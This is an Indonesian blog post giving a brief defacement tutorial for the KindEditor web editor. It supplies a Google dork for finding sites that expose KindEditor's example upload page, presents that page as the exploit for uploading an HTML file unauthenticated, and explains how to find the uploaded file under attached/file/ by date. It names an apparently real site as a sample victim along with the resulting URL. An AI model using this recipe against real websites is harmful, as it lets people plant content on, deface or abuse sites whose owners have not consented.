Oke, Langsung pancal ni.
Dork :
intitle:index of? inurl:kindeditor inurl: "examples/uploadbutton.html"
Exploit: http://target.com/path/kindeditor/examples/uploadbutton.html
Buka hasil dengan link : http//target.com/path/kindeditor/attached/file/
atau
http//target.com/themes/default/js/kindeditor/attached/file/
Kemudian cari root/folder hari ini/tanggal saat mastah melakukan upload kemudian cek file.html depesan .
Sample : http://arimlab.com/themes/default/js/kindeditor/examples/uploadbutton.html
Result :
http://arimlab.com/themes/default/js/kindeditor/attached/file/20120325/20120325121023_43134.html
0 komentar:
Posting Komentar
Terima Kasih Telah Berkunjung
Berkomentarlah Dengan Sopan !